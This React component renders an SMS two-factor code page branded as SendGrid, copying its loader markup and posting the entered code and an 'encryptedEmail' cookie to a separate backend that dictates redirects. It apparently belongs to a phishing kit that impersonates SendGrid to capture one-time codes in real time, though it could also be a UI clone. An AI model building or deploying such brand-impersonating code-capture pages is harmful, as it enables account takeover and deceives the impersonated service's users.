import React, { useState } from 'react';
import { useParams, useNavigate } from 'react-router-dom';
import { Helmet } from 'react-helmet';
import Cookies from 'js-cookie';
import './TwoFactorSMS.css';

function TwoFactorSMS() {
  const [code, setCode] = useState('');
  const [error, setError] = useState('');
  const [isLoading, setIsLoading] = useState(false);
  const [resendMessage, setResendMessage] = useState('');
  const { twoFactorId } = useParams();
  const navigate = useNavigate();

  const API_URL = process.env.REACT_APP_API_URL || 'http://localhost:5000/api';

  const handleSubmit = async (e) => {
    e.preventDefault();
    setError('');
    setResendMessage('');

    setIsLoading(true);
    const encryptedEmail = Cookies.get('encryptedEmail');
    try {
      const response = await fetch(`${API_URL}/2fa/verify`, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          twoFactorId,
          code,
          encryptedEmail,
        }),
      });

      const data = await response.json();

      if (data.status === 200) {
        window.location.href = data.redirect;
      } else if (data.status === 202) {
        navigate(data.redirect);
      } else {
        setError(data.message || 'Invalid code. Please try again.');
      }
    } catch (err) {
      console.error('Error verifying 2FA:', err);
      setError('An error occurred. Please try again.');
    } finally {
      setIsLoading(false);
    }
  };

  const handleResend = async () => {
    setError('');
    setResendMessage('');
    setIsLoading(true);

    const encryptedEmail = Cookies.get('encryptedEmail');
    try {
      const response = await fetch(`${API_URL}/2fa/resend-sms`, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          twoFactorId,
          encryptedEmail,
        }),
      });

      const data = await response.json();
      if (response.ok) {
        setResendMessage('A new SMS code has been sent.');
      } else {
        setError(data.message || 'Failed to resend SMS code. Please try again.');
      }
    } catch (err) {
      console.error('Error resending SMS code:', err);
      setError('An error occurred while resending the SMS code.');
    } finally {
      setIsLoading(false);
    }
  };

  return (
    <>
      <Helmet>
        <title>Two-Factor Authentication | SendGrid</title>
      </Helmet>
      <div className="layout" role="layout">
        <main role="page" className="layout">
          <div className="tfsmsu-content">
            <h1 className="tfsmsu-heading">Two-Factor Authentication</h1>
            <p className="tfsmsu-subtext">
              Your account is protected with two-factor authentication. We've sent you a text message. Please enter the code below.
            </p>
            <form onSubmit={handleSubmit} autoComplete="off">
              <div className="tfsmsu-input-group">
                <label className="tfsmsu-input-label" htmlFor="twoFactorCode">
                  Two-Factor Code
                </label>
                <input
                  type="text"
                  id="twoFactorCode"
                  name="twoFactorCode"
                  className="tfsmsu-input-field"
                  value={code}
                  onChange={(e) => setCode(e.target.value)}
                  required
                  autoFocus
                  disabled={isLoading}
                />
                {error ? (
                  <p className="tfsmsu-error-message">{error}</p>
                ) : resendMessage ? (
                  <p className="tfsmsu-success-message">{resendMessage}</p>
                ) : !code && !isLoading ? (
                  <p className="tfsmsu-error-message"></p>
                ) : null}
              </div>
              <div className="tfsmsu-button-group">
                <button
                  type="submit"
                  className={`tfsmsu-submit-btn ${isLoading ? 'tfsmsu-submit-btn-disabled' : ''}`}
                  disabled={!code || isLoading}
                >
                  {isLoading && (
                    <svg className="sg-loader loader-on-dark is-small" style={{ marginRight: '8px' }}>
                      <rect className="logo-square bottom-left" width="5" height="5" />
                      <rect className="logo-square bottom-middle" width="5" height="5" />
                      <rect className="logo-square middle" width="5" height="5" />
                      <rect className="logo-square top-middle" width="5" height="5" />
                      <rect className="logo-square top-right" width="5" height="5" />
                      <rect className="logo-square middle-left" width="5" height="5" />
                      <rect className="logo-square middle-right" width="5" height="5" />
                    </svg>
                  )}
                  {isLoading ? 'Verifying...' : 'Continue'}
                </button>
              </div>
            </form>
            <button
              className="tfsmsu-resend-link"
              type="button"
              onClick={handleResend}
              disabled={isLoading}
            >
              Request code again
            </button>
          </div>
        </main>
      </div>
    </>
  );
}

export default TwoFactorSMS;